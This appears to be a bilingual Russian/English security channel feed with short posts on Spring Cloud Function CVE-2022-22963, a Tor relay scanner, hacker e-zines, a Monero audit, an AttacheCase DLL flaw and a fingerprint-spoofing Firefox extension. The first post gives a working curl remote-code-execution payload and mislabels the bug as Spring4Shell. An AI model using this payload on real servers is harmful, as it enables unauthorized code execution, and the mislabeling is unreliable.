|CVE-2022-22963|
spring4shellFAQ
Spring4Shell scan
PoCApp
curl -i -s -k -X $’POST’ -H $’Host: 192.168.1.2:8080 ′ -H $’spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec(\”touch /tmp/test”)’ –data-binary $’exploit_poc’ $’ http://192.168.1.2:8080/functionRouter ’
#cve #exploit
🔥Spring4Shell.rce 0-day exploit found-in spring cloud
💥CVSS:9.0
spring4shellFAQ
Spring4Shell scan
PoCApp
A critical security vulnerability has bloomed in the Spring Cloud Function, which could lead to remote code execution (RCE) and the compromise of an entire internet-connected host.
Пока что от Spring нет готового патча, в качестве временной меры советуют понизить версию jdk.
Прикладываю архив от vx-underground ниже.
Ссылка на патч, который на данный момент разрабатывается.
So far, there is no ready-made patch from Spring, as a temporary measure, it is advised to downgrade the jdk version.
I attach the archive from vx-underground below.
Link to the patch , which is currently being developed.
The exploit is easy to execute using the curl command:CVE-2022-22963-main.zip
2.3 KB
vx-underground
пароль: infected
password: infectedpoc.py
1.7 KB
PoC Payload:
|exitmap|
В продолжение поста. Это сканер, написанный на питоне, с помощью которого можно получить больше информации о exit relays(torproject), в основном про их надёжность.
In continuation of the post. This is a scanner written in python, with which you can get more information about exit relays(torproject), mainly about their reliability.
#tor #anonymity|e-zines collection(wayback machine)|
Нашёл большой список электронных зинов(e-zines) хакерской тематики, есть как старые так, и относительно новые.
I found a large list of electronic zines (e-zines) of hacker topics, there are both old and relatively new ones.
#hacking #ezine👍1
|Monero Bulletproofs+ Security Audit|
Продолжу
#xmr #cryptocurrency
Продолжу
тему криптовалют.
Опять про монеро, только теперь про аудит безопасности системы проверки monero bulletproofs+, также можете почитать про monero bulletproofs.I will continue the topic of cryptocurrencies.
Again about Monroe, only now about the security audit of the monero bulletproofs+ verification system , you can also read about monero bulletproofs.#xmr #cryptocurrency
|CVE-2022-28128|
AttacheCase(github)
#cve
Untrusted search path vulnerability in AttacheCaseAttacheCase(github)
🦠В AttacheCase(программа для шифрования файлов) версии 3.6.1.0 и более ранних можно загружать DLL небезопасно(к примеру троян DLL), посредством ненадёжного поиска пути и получить привилегии для выполнения вредоносного кода.
Уязвимость была залатана и благодаря устранению этой, предыдущая(AttacheCase3) тоже пофикшена. Для её устранения нужно просто обновиться до последней версии.🦠In AttacheCase(file encryption software) version 3.6.1.0 and earlier, it is possible to load the DLL insecurely (for example, a Trojan DLL), through an unreliable search path and get privileges to execute malicious code.
The vulnerability was patched up and thanks to the elimination of this, the previous one (AttacheCase3) is also fixed. To fix it, you just need to upgrade to the latest version.#cve
⬆️|Chameleon|⬆️
🦊Firefox
🦊Firefox
💻Реинкарнация давно ушедшего расширения для лисы RAM(Random Agent Spoofer) , название говорит само за себя, для чего оно нужно было. Основная цель - подмена фингерпринтов и повышение конфиденциальности(НЕ АНОНИМНОСТИ!), прикладываю скрины на них функционал(просто пост сильно растянулся, тем более потихоньку начну разбирать их в следующих постах) .
Применение найдёте сами, но точно не для использования в связке поверх оверлейных сетей, запуская лису, опять же для повышения конфиденциальности - да, для анонимности - нет.
💻Reincarnation of a long-gone extension for firefox RAM(Random Agent Spoofer) , the name speaks for itself, what it was needed for. The main goal is the substitution of fingerprints and increased privacy (NOT ANONYMITY!), I attach screenshots of their functionality (just the post has stretched a lot, especially since I will slowly begin to analyze them in the following posts).
You will find the application yourself, but definitely not for use in a bundle on top of overlay networks, launching a fox, again to increase privacy - yes, for anonymity - no.
#spoof #fingerprintGitHub
GitHub - sereneblue/chameleon: WebExtension port of Random Agent Spoofer
WebExtension port of Random Agent Spoofer. Contribute to sereneblue/chameleon development by creating an account on GitHub.
👍2